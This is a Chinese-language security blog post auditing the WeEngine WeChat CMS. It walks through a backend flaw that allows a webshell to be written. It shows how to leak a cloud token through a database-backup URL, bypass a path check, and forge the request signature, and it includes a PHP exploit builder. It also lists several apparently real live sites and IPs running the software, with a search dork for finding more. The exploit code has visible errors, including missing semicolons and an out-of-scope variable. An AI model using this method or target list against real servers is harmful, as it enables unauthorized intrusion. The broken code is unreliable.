<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>PHP--微擎后台Getshell exp构造 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="0x01 目标熟悉软件简介：微擎是宿州市微擎云计算有限公司开发的一款免费开源的微信公众号管理系统">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP--微擎后台Getshell exp构造">
<meta property="og:url" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0x01 目标熟悉软件简介：微擎是宿州市微擎云计算有限公司开发的一款免费开源的微信公众号管理系统">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221205225919717.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221205230926175.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221205230806912.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221208234726862.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221208235104390.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221206092703445.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221206153500089.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221206153714847.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221206155010265.png">
<meta property="og:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221209092535245.png">
<meta property="article:published_time" content="2022-12-11T02:49:15.000Z">
<meta property="article:modified_time" content="2023-01-01T02:43:08.374Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="代码审计">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221205225919717.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.0.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-微擎审计" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/" class="article-date">
  <time class="dt-published" datetime="2022-12-11T02:49:15.000Z" itemprop="datePublished">2022-12-11</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      PHP--微擎后台Getshell exp构造
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="0x01-目标熟悉"><a href="#0x01-目标熟悉" class="headerlink" title="0x01 目标熟悉"></a>0x01 目标熟悉</h1><p>软件简介：微擎是宿州市微擎云计算有限公司开发的一款免费开源的微信公众号管理系统</p>
<span id="more"></span>

<p>官网地址：<a target="_blank" rel="noopener" href="https://www.w7.cc/">https://www.w7.cc/</a></p>
<p>开发文档（<a target="_blank" rel="noopener" href="https://wiki.w7.com/document/35/370%EF%BC%89%E4%B8%AD%E6%8F%90%E5%88%B0%EF%BC%8C%E6%BA%90%E4%BB%A3%E7%A0%81%E4%BD%8D%E4%BA%8E%EF%BC%9Ahttps://gitee.com/we7coreteam/pros">https://wiki.w7.com/document/35/370）中提到，源代码位于：https://gitee.com/we7coreteam/pros</a></p>
<p>根据在线文档（<a target="_blank" rel="noopener" href="https://wiki.w7.com/document%EF%BC%89%E4%B8%AD%E7%9A%84%E6%9B%B4%E6%96%B0%E5%85%AC%E5%91%8A%EF%BC%8C%E6%9C%80%E6%96%B0%E7%89%88%E6%98%AF2.7.50">https://wiki.w7.com/document）中的更新公告，最新版是2.7.50</a></p>
<p>根据开源代码库（<a target="_blank" rel="noopener" href="https://gitee.com/we7coreteam/pros/tree/master/upgrade%EF%BC%89%E4%B8%AD%E7%9A%84%E8%AE%B0%E5%BD%95%EF%BC%8C%E6%9C%80%E6%96%B0%E7%89%88%E6%98%AF2.7.9">https://gitee.com/we7coreteam/pros/tree/master/upgrade）中的记录，最新版是2.7.9</a></p>
<p>网站搭建好后，在底部又发现最新版是2.7.108</p>
<h1 id="0x02-环境搭建"><a href="#0x02-环境搭建" class="headerlink" title="0x02 环境搭建"></a>0x02 环境搭建</h1><p>搭建微擎的过程中踩了很多坑，以下2个坑想搭建的师傅有个心理准备：</p>
<p>1 微擎的版本挺错乱的，下载后是2.7.108，结果搭建完成后底部却显示2.7.94，同样其他版本也是，下载时是一个版本，搭建后又是另一个版本</p>
<p>2 在最新的官网上已经不再提供离线安装的版本，而且提供的安装包（<a target="_blank" rel="noopener" href="https://gitee.com/we7coreteam/pros%EF%BC%89%E4%B9%9F%E6%98%AF%E5%BE%88%E5%A4%9A%E5%8A%9F%E8%83%BD%E4%B8%8D%E5%85%A8%EF%BC%8C%E5%BF%85%E9%A1%BB%E8%A6%81%E5%9C%A8%E5%AE%98%E7%BD%91%E6%B3%A8%E5%86%8C%E8%AE%A4%E8%AF%81%E8%BF%87%E4%BA%86%E6%89%8D%E8%83%BD%E9%80%9A%E8%BF%87%E5%9C%A8%E7%BA%BF%E5%8D%87%E7%BA%A7%E6%9D%A5%E8%8E%B7%E5%8F%96%E5%88%B0%E5%85%A8%E9%83%A8%E5%8A%9F%E8%83%BD%EF%BC%8C%E6%9C%89%E7%82%B9%E8%AE%A9%E4%BA%BA%E6%97%A0%E8%AF%AD">https://gitee.com/we7coreteam/pros）也是很多功能不全，必须要在官网注册认证过了才能通过在线升级来获取到全部功能，有点让人无语</a></p>
<p>下面是对官网提供的安装脚本的安装演示，一开始使用mac下的php集成环境MAMP，结果在最后一步连接数据库的时候会有问题，这里改用windows下集成环境phpstudy，将项目放到phpstudy对应目录下，访问后按提示操作即可，搭建完成如下图</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221205225919717.png" alt="image-20221205225919717"></p>
<p>访问目标地址，发现是已登录状态</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221205230926175.png" alt="image-20221205230926175"></p>
<p>使用全新的浏览器访问目标地址，可看到未登录状态下首页如下图</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221205230806912.png" alt="image-20221205230806912"></p>
<p>下图是踩坑时搭建的多个版本</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221208234726862.png" alt="image-20221208234726862"></p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221208235104390.png" alt="image-20221208235104390"></p>
<h1 id="0x03-互联网案例"><a href="#0x03-互联网案例" class="headerlink" title="0x03 互联网案例"></a>0x03 互联网案例</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">https://www.zxida.com/web/</span><br><span class="line">https://39.98.239.118/web/</span><br><span class="line">https://www.cdwjsq.com/web/</span><br><span class="line">https://mp.wxquan.cn/web/</span><br><span class="line">http://49.234.65.194/web/</span><br><span class="line">http://wx.mindmob.cn/web/</span><br><span class="line"></span><br><span class="line">intitle:&quot;微擎 - 公众平台自助引擎 - Powered by W7.CC&quot;</span><br></pre></td></tr></table></figure>

<h1 id="0x04-开始审计"><a href="#0x04-开始审计" class="headerlink" title="0x04 开始审计"></a>0x04 开始审计</h1><h2 id="01-目录结构"><a href="#01-目录结构" class="headerlink" title="01 目录结构"></a>01 目录结构</h2><p>源码下载到本地后，可以看到目录结构如下</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221206092703445.png" alt="image-20221206092703445"></p>
<p>对上述目录结构解释如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">addons             微擎模块</span><br><span class="line">api                对接外部系统接口</span><br><span class="line">app                微站 （Mobile / App）</span><br><span class="line">data               存放配置文件</span><br><span class="line">framework          微擎框架</span><br><span class="line">payment            支付调用目录</span><br><span class="line">tester             测试用例</span><br><span class="line">upgrade            升级脚本</span><br><span class="line">web                后台管理</span><br><span class="line">api.php            微信api接口</span><br><span class="line">console.php        命令行执行文件</span><br><span class="line">index.php          系统入口</span><br><span class="line">install.php        安装文件</span><br><span class="line"></span><br><span class="line">attachment         附件目录</span><br></pre></td></tr></table></figure>

<h2 id="02-确定路由"><a href="#02-确定路由" class="headerlink" title="02 确定路由"></a>02 确定路由</h2><p>当传入的URL请求中包含一个名为 <strong>c</strong>、<strong>a</strong>、<strong>do</strong>的 GET 参数，它即被视为一个路由，例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://we7.cc/web/index.php?c=platform&amp;a=menu&amp;</span><br><span class="line">则会路由至 /web/source/platform/menu.ctrl.php 文件中</span><br><span class="line"></span><br><span class="line">http://we7.cc/app/index.php?c=mc&amp;a=home&amp;</span><br><span class="line">则会路由至 /app/source/mc/home.ctrl.php 文件中</span><br></pre></td></tr></table></figure>

<p>其中c为控制器（controller），a为操作（action），do为行为（do），且do是可选的，也就是不指定的话会使用默认行为</p>
<p>控制器以文件夹、文件的形式组织，位于系统的 <strong>source</strong> 目录下，每一个目录代表一个 <strong>controller</strong> ，文件夹中的每个文件即为一个 <strong>action</strong>。某些情况，一个action可能会包含多个操作，系统中提供 <strong>do</strong> 参数来用于区分同一个 <strong>action</strong> 中的不同操作。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://pro.we7.cc/web/index.php?c=extension&amp;a=module&amp;do=designer</span><br></pre></td></tr></table></figure>

<p> extension为控制器，module为action，designer为该action下的某一个具体的do</p>
<p>微擎中对于模块的访问，路由稍微不一样</p>
<p>当传入的 <strong>c</strong> 值为 “site”, <strong>a</strong> 值为 “entry”时则是一个模块路由，例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://we7.cc/web/index.php?c=site&amp;a=entry&amp;do=themeset&amp;m=we7_demo</span><br></pre></td></tr></table></figure>

<p>则会路由至 <strong>/addons/we7_demo/site.php</strong> 文件中的 <strong>doWebThemeset()</strong> 方法。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://we7.cc/app/index.php?i=1&amp;j=2&amp;c=entry&amp;do=list&amp;m=we7_demo</span><br></pre></td></tr></table></figure>

<p>则会路由至 <strong>/addons/we7_demo/site.php</strong> 文件中的 <strong>doMobileList()</strong> 方法。</p>
<h2 id="03-确定鉴权"><a href="#03-确定鉴权" class="headerlink" title="03 确定鉴权"></a>03 确定鉴权</h2><p>文档中提到，移动端代码位于目录/app/下，web段代码位于目录/web/下，我们先看下web端代码，目录结构如下</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221206153500089.png" alt="image-20221206153500089"></p>
<p>其中入口文件为index.php，通读index.php后会发现，鉴权主要由如下代码实现</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221206153714847.png" alt="image-20221206153714847"></p>
<p>可看到如果访问的是无需鉴权的接口，则直接跳到对应controller及action处，否则会调用checklogin()，也就是需要检查登录状态</p>
<p>其中$acl在上面被定义为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$acl = require IA_ROOT . &#x27;/web/common/permission.inc.php&#x27;;</span><br></pre></td></tr></table></figure>

<p>进入文件permission.inc.php可看到，控制器advertisement下面无可直接访问的action，控制器article下面notice-show，news-show，notice-news是可直接访问的</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221206155010265.png" alt="image-20221206155010265"></p>
<p>依照此规律，可梳理出前台访问的接口，及后台访问的接口</p>
<h2 id="04-前台漏洞"><a href="#04-前台漏洞" class="headerlink" title="04 前台漏洞"></a>04 前台漏洞</h2><p>前台接口中暂未发现漏洞点</p>
<h2 id="05-后台漏洞"><a href="#05-后台漏洞" class="headerlink" title="05 后台漏洞"></a>05 后台漏洞</h2><h3 id="漏洞1：已公开但无POC"><a href="#漏洞1：已公开但无POC" class="headerlink" title="漏洞1：已公开但无POC"></a>漏洞1：已公开但无POC</h3><p>漏洞出现在web/source/cloud/dock.ctrl.php</p>
<p><img src="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/image-20221209092535245.png" alt="image-20221209092535245"></p>
<p>简单讲述一下代码逻辑（搞懂下面的逻辑，才能构造exp），根据之前的路由分析可知，传入的动作为download时，进入子句</p>
<p>传入的post数据如果进行了base64编码，则解码后赋值给data，否则直接赋值给data，对data进行反序列化，反序列化后先对数组中的file进行base64解码，再判断是否存在gzcompress和gzuncompress，存在的话再进行解压，最后赋值给file</p>
<p>从缓存中获取cloud_transtoken，并传入authcode进行解密，赋值给全局变量$_W中的setting-&gt;site-&gt;token，对file进行md5加密再拼接数组中的path以及全局变量$_W中的setting-&gt;site-&gt;token，最后赋值给string</p>
<p>如果全局变量$_W中的setting-&gt;site-&gt;token非空，且string进行md5加密后等于数组中的sign，则进入子句</p>
<p>判断数组中的path是否以”/web”或”/framework”开头，此处我们在构造数组中path的时候只需以”/“开头即可绕过，绕过后子句中构造数组path的全路径，最后调用file_put_contents写入webshell</p>
<p>这里有一个难点，就是从缓存中获取cloud_transtoken，全局搜索，通过分析发现，访问链接 <a href="http://ip:port/web/index.php?c=system&amp;a=database&amp;do=backup&amp;status=1&amp;start=2&amp;folder_suffix=123&amp;volume_suffix=456">http://ip:port/web/index.php?c=system&amp;a=database&amp;do=backup&amp;status=1&amp;start=2&amp;folder_suffix=123&amp;volume_suffix=456</a> 进行数据库备份，则数据库备份文件的地址为：<a href="http://ip:port/data/backup/123/volume-456-1.sql，拿到数据库备份后，全局搜索cloud_transtoken，可获取cloud_transtoken的值，对应的exp编写如下">http://ip:port/data/backup/123/volume-456-1.sql，拿到数据库备份后，全局搜索cloud_transtoken，可获取cloud_transtoken的值，对应的exp编写如下</a></p>
<p>简单解释一下，调用项目中的函数authcode，传入cloud_transtoken，获取返回的值，根据之前分析的代码逻辑，反向构造原始数据包，并将payload嵌入其中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">function authcode($string, $operation = &#x27;DECODE&#x27;, $key = &#x27;&#x27;, $expiry = 0) &#123;</span><br><span class="line">    $ckey_length = 4;</span><br><span class="line">    $key = md5(&#x27;&#x27; != $key ? $key : &quot;62a37a4d&quot;);</span><br><span class="line">    $keya = md5(substr($key, 0, 16));</span><br><span class="line">    $keyb = md5(substr($key, 16, 16));</span><br><span class="line">    $keyc = $ckey_length ? (&#x27;DECODE&#x27; == $operation ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : &#x27;&#x27;;</span><br><span class="line"></span><br><span class="line">    $cryptkey = $keya . md5($keya . $keyc);</span><br><span class="line">    $key_length = strlen($cryptkey);</span><br><span class="line"></span><br><span class="line">    $string = &#x27;DECODE&#x27; == $operation ? base64_decode(substr($string, $ckey_length)) : sprintf(&#x27;%010d&#x27;, $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;</span><br><span class="line">    $string_length = strlen($string);</span><br><span class="line"></span><br><span class="line">    $result = &#x27;&#x27;;</span><br><span class="line">    $box = range(0, 255);</span><br><span class="line"></span><br><span class="line">    $rndkey = array();</span><br><span class="line">    for ($i = 0; $i &lt;= 255; ++$i) &#123;</span><br><span class="line">        $rndkey[$i] = ord($cryptkey[$i % $key_length]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    for ($j = $i = 0; $i &lt; 256; ++$i) &#123;</span><br><span class="line">        $j = ($j + $box[$i] + $rndkey[$i]) % 256;</span><br><span class="line">        $tmp = $box[$i];</span><br><span class="line">        $box[$i] = $box[$j];</span><br><span class="line">        $box[$j] = $tmp;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    for ($a = $j = $i = 0; $i &lt; $string_length; ++$i) &#123;</span><br><span class="line">        $a = ($a + 1) % 256;</span><br><span class="line">        $j = ($j + $box[$a]) % 256;</span><br><span class="line">        $tmp = $box[$a];</span><br><span class="line">        $box[$a] = $box[$j];</span><br><span class="line">        $box[$j] = $tmp;</span><br><span class="line">        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if (&#x27;DECODE&#x27; == $operation) &#123;</span><br><span class="line">        if ((0 == substr($result, 0, 10) || substr($result, 0, 10) - time() &gt; 0) &amp;&amp; substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) &#123;</span><br><span class="line">            return substr($result, 26);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            return &#x27;&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        return $keyc . str_replace(&#x27;=&#x27;, &#x27;&#x27;, base64_encode($result));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$cloud_transtoken = &quot;&quot;</span><br><span class="line">$token = authcode($cloud_transtoken, &quot;DECODE&quot;);</span><br><span class="line"></span><br><span class="line">function build() &#123;</span><br><span class="line">    $file = &quot;aaa&quot;;</span><br><span class="line">    $path = &quot;/test.txt&quot;</span><br><span class="line">    $string = (md5($file) . $path . $token);</span><br><span class="line">    $sign = md5($string)</span><br><span class="line"></span><br><span class="line">    $file_ = gzcompress($file);</span><br><span class="line">    // print($file_);</span><br><span class="line">    $file__ = base64_encode($file_);</span><br><span class="line">    // print($file__);</span><br><span class="line"></span><br><span class="line">    $ret = array(</span><br><span class="line">        &quot;file&quot; =&gt; $file__,</span><br><span class="line">        &quot;path&quot; =&gt; $path,</span><br><span class="line">        &quot;sign&quot; =&gt; $sign</span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    print(serialize($ret));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">// build();</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line">$gz = function_exists(&#x27;gzcompress&#x27;) &amp;&amp; function_exists(&#x27;gzuncompress&#x27;);</span><br><span class="line">if ($gz) &#123;</span><br><span class="line">    echo &quot;yes&quot;;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    echo &quot;no&quot;;</span><br><span class="line">&#125;</span><br><span class="line">*/</span><br></pre></td></tr></table></figure>

<p>由于我这边是本地搭建的环境，站点无法注册，导致数据库备份后无cloud_transtoken，不能演示打poc过程，对于实际站点，获取cloud_transtoken后，可基于上述poc获取webshell</p>
<h1 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h1><p>微擎 CMS：从 SQL 到 RCE   <a target="_blank" rel="noopener" href="https://cnpanda.net/codeaudit/863.html">https://cnpanda.net/codeaudit/863.html</a></p>
<p>记一次从源代码泄漏到后台获取webshell的过程   <a target="_blank" rel="noopener" href="https://fuping.site/2020/04/18/WeiQing-CMS-Background-Admin-GetShell/">https://fuping.site/2020/04/18/WeiQing-CMS-Background-Admin-GetShell/</a></p>
<p>代码审计之某通用商城系统getshell过程   <a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/rSP8LQJpIkP-Ahljkof5sA">https://mp.weixin.qq.com/s/rSP8LQJpIkP-Ahljkof5sA</a></p>
<p>微擎路由   <a target="_blank" rel="noopener" href="https://www.kancloud.cn/donknap/we7/134629">https://www.kancloud.cn/donknap/we7/134629</a></p>
<p>微擎设置开发模式   <a target="_blank" rel="noopener" href="https://www.kancloud.cn/tieniuweb/we7web/1431036">https://www.kancloud.cn/tieniuweb/we7web/1431036</a></p>
<p>微擎加载器   <a target="_blank" rel="noopener" href="https://www.kancloud.cn/donknap/we7/134628">https://www.kancloud.cn/donknap/we7/134628</a></p>
<p>离线安装包   <a target="_blank" rel="noopener" href="http://www.log4cpp.com/learnother/17.html">http://www.log4cpp.com/learnother/17.html</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/" data-id="cldqqwxqp000t6qgrdwwbfnyo" data-title="PHP--微擎后台Getshell exp构造" class="article-share-link">Share</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/12/29/%E6%82%9F%E7%A9%BACRM%E5%AE%A1%E8%AE%A1/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          PHP--悟空CRM后台Getshell
        
      </div>
    </a>
  
  
    <a href="/2022/12/10/Nim%E8%AF%AD%E8%A8%80%E5%AD%A6%E4%B9%A0/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Nim语言学习</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E6%89%93%E7%82%B9/" rel="tag">Web打点</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%85%8D%E6%9D%80%E5%AF%B9%E6%8A%97/" rel="tag">免杀对抗</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%82%B9%E6%BB%B4%E7%94%9F%E6%B4%BB/" rel="tag">点滴生活</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" rel="tag">环境搭建</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Web%E6%89%93%E7%82%B9/" style="font-size: 10px;">Web打点</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 20px;">代码审计</a> <a href="/tags/%E5%85%8D%E6%9D%80%E5%AF%B9%E6%8A%97/" style="font-size: 15px;">免杀对抗</a> <a href="/tags/%E7%82%B9%E6%BB%B4%E7%94%9F%E6%B4%BB/" style="font-size: 10px;">点滴生活</a> <a href="/tags/%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA/" style="font-size: 15px;">环境搭建</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/12/">December 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/11/">November 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/10/">October 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">July 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">March 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/02/">February 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/12/29/JPress%E5%AE%A1%E8%AE%A1/">JAVA--JPress最新版后台Getshell</a>
          </li>
        
          <li>
            <a href="/2022/12/29/%E6%82%9F%E7%A9%BACRM%E5%AE%A1%E8%AE%A1/">PHP--悟空CRM后台Getshell</a>
          </li>
        
          <li>
            <a href="/2022/12/11/%E5%BE%AE%E6%93%8E%E5%AE%A1%E8%AE%A1/">PHP--微擎后台Getshell exp构造</a>
          </li>
        
          <li>
            <a href="/2022/12/10/Nim%E8%AF%AD%E8%A8%80%E5%AD%A6%E4%B9%A0/">Nim语言学习</a>
          </li>
        
          <li>
            <a href="/2022/11/12/%E5%9F%BA%E4%BA%8ENim%E8%AF%AD%E8%A8%80%E7%9A%84%E5%85%8D%E6%9D%80%E6%89%93%E5%8C%85%E5%99%A8/">基于Nim语言的免杀打包器</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
